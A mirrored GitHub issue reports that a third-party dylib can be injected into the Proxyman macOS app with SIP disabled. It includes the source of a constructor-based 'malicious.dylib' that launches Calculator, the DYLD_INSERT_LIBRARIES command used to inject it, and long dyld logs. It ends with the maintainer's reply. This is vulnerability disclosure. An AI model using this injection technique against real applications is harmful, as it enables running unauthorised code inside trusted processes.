starred/Proxyman
1
0
Fork 0
mirror of https://github.com/ProxymanApp/Proxyman.git synced 2026-04-26 16:45:57 +03:00
Code Issues 1.2k Projects Releases 5 Packages Wiki Activity

[GH-ISSUE #788] Mapping 3rd party signed dylib into process space may produce unexpected results with SIP OFF #783

New issue
Open
opened 2026-03-03 19:21:52 +03:00 by kerem · 2 comments
kerem commented 2026-03-03 19:21:52 +03:00
Owner
Copy link

Originally created by @xsscx on GitHub (Feb 12, 2021).
Original GitHub issue: https://github.com/ProxymanApp/Proxyman/issues/788

Proxyman version? (Ex. Proxyman 1.4.3)

2.17.0

macOS Version? (Ex. mac 10.14)

20.2.0 Darwin Kernel Version 20.2.0: Wed Dec 2 20:39:59 PST 2020; root:xnu-7195.60.75~1/RELEASE_X86_64 x86_64

Steps to reproduce

ISSUE

Mapping a 3rd party signed dylib into your process space may produce unexpected results with SIP OFF.

uname -a = MAC 20.2.0 Darwin Kernel Version 20.2.0: Wed Dec 2 20:39:59 PST 2020; root:xnu-7195.60.75~1/RELEASE_X86_64 x86_64

We're analyzing a recent build of Proxyman for MAC, details below:

Proxyman.App Identification on OSX V 2.17.0
md5 /Applications/Proxyman.app/Contents/MacOS/Proxyman
MD5 (/Applications/Proxyman.app/Contents/MacOS/Proxyman) = 400ab7bfcafe530ff56c8075d0e02347
...
codesign -dvvv /Applications/Proxyman.app/Contents/MacOS/Proxyman
Executable=/Applications/Proxyman.app/Contents/MacOS/Proxyman
...

Issue Description
codesign -dvvv ~/Documents/dlyd/malicious.dylib
Executable=/Users/xss/Documents/dlyd/malicious.dylib
Identifier=malicious
Format=Mach-O thin (x86_64)
...
Injected dylib Code
#include <Foundation/Foundation.h>
attribute((constructor)) static void pwn() {
puts("\n\nHELLO FROM THE DYLIB!\n\n");
NSTask *task = [[NSTask alloc] init];
task.launchPath = @"/System/Applications/Calculator.app/Contents/MacOS/Calculator";
[task launch];
}

PoC

REQUIREMENT: SIP OFF

DYLD_PRINT_APIS=1 DYLD_PRINT_BINDINGS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_PRINT_REBASINGS=1 DYLD_PRINT_SEGMENTS=1 DYLD_PRINT_STATISTICS=1 DYLD_PRINT_DOFS=1 DYLD_PRINT_RPATHS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/Proxyman.app/Contents/MacOS/Proxyman

RESULT

Watch Proxyman Startup, Watch Calculator Open

LOGGING
REQUIREMENT: SIP OFF
....
DYLD_PRINT_APIS=1 DYLD_PRINT_BINDINGS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_PRINT_REBASINGS=1 DYLD_PRINT_SEGMENTS=1 DYLD_PRINT_STATISTICS=1 DYLD_PRINT_DOFS=1 DYLD_PRINT_RPATHS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/Proxyman.app/Contents/MacOS/Proxyman....
...
dyld: calling initializer function 0x7fff2404c1e0 in /usr/lib/libnetwork.dylib
dyld: calling initializer function 0x7fff20f8273e in /usr/lib/libmecabra.dylib
dyld: calling initializer function 0x7fff20f82c08 in /usr/lib/libmecabra.dylib
dyld: calling initializer function 0x106a26eb0 in ./malicious.dylib
dyld: lazy bind: malicious.dylib:0x106A2B008 = libsystem_c.dylib:_puts, *0x106A2B008 = 0x7FFF20268274
...
HELLO FROM THE DYLIB!
...
dyld: lazy bind: malicious.dylib:0x106A2B000 = libobjc.A.dylib:_objc_alloc_init, *0x106A2B000 = 0x7FFF20211067
_dyld_is_memory_immutable(0x7fff2148cf87, 25)
_dyld_is_memory_immutable(0x7fff2148cf87, 25)
_dyld_is_memory_immutable(0x7fff2148cf87, 25)
dyld: calling -init function 0x7fff21978b00 in /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText
re-using existing shared cache (/System/Library/dyld/dyld_shared_cache_x86_64h):
0x7FFF20045000->0x7FFF7FFC4FFF init=5, max=5 read execute
0x7FFF80045000->0x7FFF8DFE8FFF init=3, max=3 read write data
dyld: calling initializer functi 0x7FFFC0045000->0x7FFFE2on 0x7fff2bd1c030 in /System/Lib2E4FFF init=1, max=1 read
rary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATSUI.framework/Versions/A/ATSUI
dyld: Main executable mapped /System/Applications/Calculator.app/Contents/MacOS/Calculator
__PAGEZERO at 0x00000000->0x100000000
__TEXT at 0x109884000->0x1098A8000
__DATA_CONST at 0x1098A8000->0x1098AC000
__DATA at 0x1098AC000->0x1098B8000
__LINKEDIT at 0x1098B8000->0x1098C4000
dyld: calling initializer function 0x7fff215cd9e0 in /System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay
dyld: cdyld: Mapping ./malicious.dylib
...
dyld: rebase: Calculator:*0x1098A8100 += 0x09884000
dyld: rebase: Calculator:*0x1098A8108 += 0x09884000
dyld: rebase: Calculator:*0x1098A8110 += 0x09884000
dyld: rebase: Calculator:*0x1098A8130 += 0x09884000
dyld: rebase: Calculator:*0x1098A8138 += 0x09884000
dyld: rebase: Calculator:*0x1098A8140 += 0x09884000
dyld: rebase: Calculator:*0x1098A8160 += 0x09884000
dyld: rebase: Calculator:*0x1098A8168 += 0x09884000
dyld: rebase: Calculator:*0x1098A8170 += 0x09884000
dyld: rebase: Calculator:*0x1098A8190 += 0x09884000
dyld: rebase: Calculator:*0x1098A8198 += 0x09884000
dyld: rebase: Calculator:*0x1098A81A0 += 0x09884000
dyld: rebase: Calculator:*0x1098A81C0 += 0x09884000
dyld: rebase: Calculator:*0x1098A81E0 += 0x09884000
dyld: rebase: Calculator:*0x1098A81E8 += 0x09884000
dyld: calling initializer functidyld: rebase: Calculator:*0x1098on 0x10687ecb0 in /Applications/A8200 += 0x09884000 Proxyman.app/Contents/MacOS/Proxyman
dyld: rebase: Calculator:*0x1098A8208 += 0x09884000
dyld: rebase: Calculator:*0x1098A8210 += 0x09884000
dyld: rebase: Calculator:*0x1098A8230 += 0x09884000
dyld: rebase: Calculator:*0x1098A8250 += 0x09884000
...
Execution Confirmation: dyld: Main executable mapped /System/Applications/Calculator.app/Contents/MacOS/Calculator
...
REQUIREMENT: SIP OFF

Expected behavior

Do Not Execute Injected dylib

Screenshots (optional)

Originally created by @xsscx on GitHub (Feb 12, 2021). Original GitHub issue: https://github.com/ProxymanApp/Proxyman/issues/788 ### Proxyman version? (Ex. Proxyman 1.4.3) 2.17.0 ### macOS Version? (Ex. mac 10.14) 20.2.0 Darwin Kernel Version 20.2.0: Wed Dec 2 20:39:59 PST 2020; root:xnu-7195.60.75~1/RELEASE_X86_64 x86_64 ### Steps to reproduce ISSUE Mapping a 3rd party signed dylib into your process space may produce unexpected results with SIP OFF. uname -a = MAC 20.2.0 Darwin Kernel Version 20.2.0: Wed Dec 2 20:39:59 PST 2020; root:xnu-7195.60.75~1/RELEASE_X86_64 x86_64 We're analyzing a recent build of Proxyman for MAC, details below: Proxyman.App Identification on OSX V 2.17.0 md5 /Applications/Proxyman.app/Contents/MacOS/Proxyman MD5 (/Applications/Proxyman.app/Contents/MacOS/Proxyman) = 400ab7bfcafe530ff56c8075d0e02347 ... codesign -dvvv /Applications/Proxyman.app/Contents/MacOS/Proxyman Executable=/Applications/Proxyman.app/Contents/MacOS/Proxyman ... Issue Description codesign -dvvv ~/Documents/dlyd/malicious.dylib Executable=/Users/xss/Documents/dlyd/malicious.dylib Identifier=malicious Format=Mach-O thin (x86_64) ... Injected dylib Code #include <Foundation/Foundation.h> __attribute__((constructor)) static void pwn() { puts("\n\nHELLO FROM THE DYLIB!\n\n"); NSTask *task = [[NSTask alloc] init]; task.launchPath = @"/System/Applications/Calculator.app/Contents/MacOS/Calculator"; [task launch]; } PoC REQUIREMENT: SIP OFF DYLD_PRINT_APIS=1 DYLD_PRINT_BINDINGS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_PRINT_REBASINGS=1 DYLD_PRINT_SEGMENTS=1 DYLD_PRINT_STATISTICS=1 DYLD_PRINT_DOFS=1 DYLD_PRINT_RPATHS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/Proxyman.app/Contents/MacOS/Proxyman RESULT Watch Proxyman Startup, Watch Calculator Open LOGGING REQUIREMENT: SIP OFF .... DYLD_PRINT_APIS=1 DYLD_PRINT_BINDINGS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_PRINT_REBASINGS=1 DYLD_PRINT_SEGMENTS=1 DYLD_PRINT_STATISTICS=1 DYLD_PRINT_DOFS=1 DYLD_PRINT_RPATHS=1 DYLD_PRINT_INITIALIZERS=1 DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/Proxyman.app/Contents/MacOS/Proxyman.... ... dyld: calling initializer function 0x7fff2404c1e0 in /usr/lib/libnetwork.dylib dyld: calling initializer function 0x7fff20f8273e in /usr/lib/libmecabra.dylib dyld: calling initializer function 0x7fff20f82c08 in /usr/lib/libmecabra.dylib dyld: calling initializer function 0x106a26eb0 in ./malicious.dylib dyld: lazy bind: malicious.dylib:0x106A2B008 = libsystem_c.dylib:_puts, *0x106A2B008 = 0x7FFF20268274 ... HELLO FROM THE DYLIB! ... dyld: lazy bind: malicious.dylib:0x106A2B000 = libobjc.A.dylib:_objc_alloc_init, *0x106A2B000 = 0x7FFF20211067 _dyld_is_memory_immutable(0x7fff2148cf87, 25) _dyld_is_memory_immutable(0x7fff2148cf87, 25) _dyld_is_memory_immutable(0x7fff2148cf87, 25) dyld: calling -init function 0x7fff21978b00 in /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText re-using existing shared cache (/System/Library/dyld/dyld_shared_cache_x86_64h): 0x7FFF20045000->0x7FFF7FFC4FFF init=5, max=5 read execute 0x7FFF80045000->0x7FFF8DFE8FFF init=3, max=3 read write data dyld: calling initializer functi 0x7FFFC0045000->0x7FFFE2on 0x7fff2bd1c030 in /System/Lib2E4FFF init=1, max=1 read rary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATSUI.framework/Versions/A/ATSUI dyld: Main executable mapped /System/Applications/Calculator.app/Contents/MacOS/Calculator __PAGEZERO at 0x00000000->0x100000000 __TEXT at 0x109884000->0x1098A8000 __DATA_CONST at 0x1098A8000->0x1098AC000 __DATA at 0x1098AC000->0x1098B8000 __LINKEDIT at 0x1098B8000->0x1098C4000 dyld: calling initializer function 0x7fff215cd9e0 in /System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay dyld: cdyld: Mapping ./malicious.dylib ... dyld: rebase: Calculator:*0x1098A8100 += 0x09884000 dyld: rebase: Calculator:*0x1098A8108 += 0x09884000 dyld: rebase: Calculator:*0x1098A8110 += 0x09884000 dyld: rebase: Calculator:*0x1098A8130 += 0x09884000 dyld: rebase: Calculator:*0x1098A8138 += 0x09884000 dyld: rebase: Calculator:*0x1098A8140 += 0x09884000 dyld: rebase: Calculator:*0x1098A8160 += 0x09884000 dyld: rebase: Calculator:*0x1098A8168 += 0x09884000 dyld: rebase: Calculator:*0x1098A8170 += 0x09884000 dyld: rebase: Calculator:*0x1098A8190 += 0x09884000 dyld: rebase: Calculator:*0x1098A8198 += 0x09884000 dyld: rebase: Calculator:*0x1098A81A0 += 0x09884000 dyld: rebase: Calculator:*0x1098A81C0 += 0x09884000 dyld: rebase: Calculator:*0x1098A81E0 += 0x09884000 dyld: rebase: Calculator:*0x1098A81E8 += 0x09884000 dyld: calling initializer functidyld: rebase: Calculator:*0x1098on 0x10687ecb0 in /Applications/A8200 += 0x09884000 Proxyman.app/Contents/MacOS/Proxyman dyld: rebase: Calculator:*0x1098A8208 += 0x09884000 dyld: rebase: Calculator:*0x1098A8210 += 0x09884000 dyld: rebase: Calculator:*0x1098A8230 += 0x09884000 dyld: rebase: Calculator:*0x1098A8250 += 0x09884000 ... Execution Confirmation: dyld: Main executable mapped /System/Applications/Calculator.app/Contents/MacOS/Calculator ... REQUIREMENT: SIP OFF ### Expected behavior Do Not Execute Injected dylib ### Screenshots (optional)
kerem commented 2026-03-03 19:21:53 +03:00
Author
Owner
Copy link

@NghiaTranUIT commented on GitHub (Feb 12, 2021):

Hi,

I’m not sure why it’s possible since we have already enabled Hardened runtime https://developer.apple.com/documentation/security/hardened_runtime and Notarized the build. I suppose that it should prevent injecting 3rd-party dylib, shouldn’t it?

<!-- gh-comment-id:778256617 --> @NghiaTranUIT commented on GitHub (Feb 12, 2021): Hi, I’m not sure why it’s possible since we have already enabled Hardened runtime https://developer.apple.com/documentation/security/hardened_runtime and Notarized the build. I suppose that it should prevent injecting 3rd-party dylib, shouldn’t it?
kerem commented 2026-03-03 19:21:53 +03:00
Author
Owner
Copy link

@NghiaTranUIT commented on GitHub (Feb 12, 2021):

I will take a look tomorrow and find the solution to fix it

<!-- gh-comment-id:778256867 --> @NghiaTranUIT commented on GitHub (Feb 12, 2021): I will take a look tomorrow and find the solution to fix it
Sign in to join this conversation.
No Branch/Tag specified
Branches Tags
master
6.9.0
6.8.0
6.7.0
6.6.0
6.5.0
6.4.0
6.3.0
6.2.0
6.1.0
6.0.2
6.0.0
6.0.1
5.25.0
5.24.0
5.23.0
5.23.1
5.22.0
5.20.0
5.21.0
5.19.0
5.18.0
5.17.0
5.16.0
5.15.0
5.14.0
5.12.2
5.12.1
5.12.0
5.11.0
5.10.0
5.8.0
5.9.0
5.7.0
5.6.1
5.6.0
5.5.0
5.4.0
5.2.0
5.3.0
5.1.1
5.0.0
4.16.0
4.15.0
4.14.0
4.13.0
4.12.0
4.11.0
4.10.0
4.9.1
4.9.0
4.8.2
4.8.1
4.8.0
4.7.1
4.7.0
4.6.1
4.6.0
4.5.0
4.4.0
4.3.1
4.3.0
4.2.1
4.2.0
4.1.0
4.0.0
3.15.0
3.14.0
3.13.0
3.12.0
3.11.0
3.10.0
3.9.0
3.8.0
3.7.0
3.6.2
3.6.1
3.6.0
3.5.2
3.5.1
3.5.0
3.4.0
3.3.0
3.2.0
3.1.0
3.0.0
2.35.4
2.35.3
2.35.2
2.35.1
2.35.0
2.34.1
2.34.0
2.33.0
2.32.1
2.32.0
2.31.0
2.30.0
2.29.0
2.28.0
2.27.0
2.26.0
2.25.0
2.24.0
2.23.0
2.22.0
2.21.1
2.21.0
2.20.0
2.19.0
2.18.0
2.17.0
2.16.1
2.16.0
2.15.2
2.15.1
2.15.0
2.14.2
2.14.1
2.14.0
2.13.0
2.12.0
2.11.1
2.11.0
2.10.0
2.9.1
2.9.0
2.8.0
2.7.0
2.6.0
2.5.3
2.5.2
2.5.1
2.5.0
2.4.2
2.4.1
2.4.0
2.3.0
2.2.0
2.1.1
2.1.0
2.0.1
2.0.0
1.24.0
1.23.0
1.22.0
1.21.0
1.20.0
1.19.0
1.18.1
1.18.0
1.17.1
1.17.0
1.16.0
1.15.0
1.14.1
1.14.0
1.13.1
1.13.0
1.12.0
1.11.0
1.10.0
1.9.3
1.9.2
1.9.1
1.9.0
1.8.0
1.7.2
1.7.1
1.7.0
1.6.2
1.6.1
1.6.0
1.5.1
1.5.0
1.4.7
1.4.6
1.4.5.1
1.4.5
1.4.4.1
1.4.4
1.4.3
1.4.2
1.4.1.1
1.4.1
1.4
1.3.9
1.3.8
1.3.7
1.3.6
1.3.5
1.3.4.3
1.3.4.2
1.3.4.1
1.3.4
1.3.3
1.3.2
1.3.1
1.3
1.2
1.1.2
1.1.1
1.1
1.0.3
1.0.2
1.0
0.8.1
0.8
0.7
0.6
0.5.1
0.5
v0.4.1
Labels
Clear labels   
Discussion

   
Feature request

   
In Progress...

   
Plugins

   
Waiting response

   
Windows

   
Windows

   
bug

   
duplicate

   
enhancement

   
feature

   
good first issue

   
iOS

   
macOS 10.11

   
question

   
wontfix

   
Done
No labels
Discussion
Feature request
In Progress...
Plugins
Waiting response
Windows
Windows
bug
duplicate
enhancement
feature
good first issue
iOS
macOS 10.11
question
wontfix
Done
Milestone
Clear milestone
No items
No milestone
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
starred/Proxyman#783
No description provided.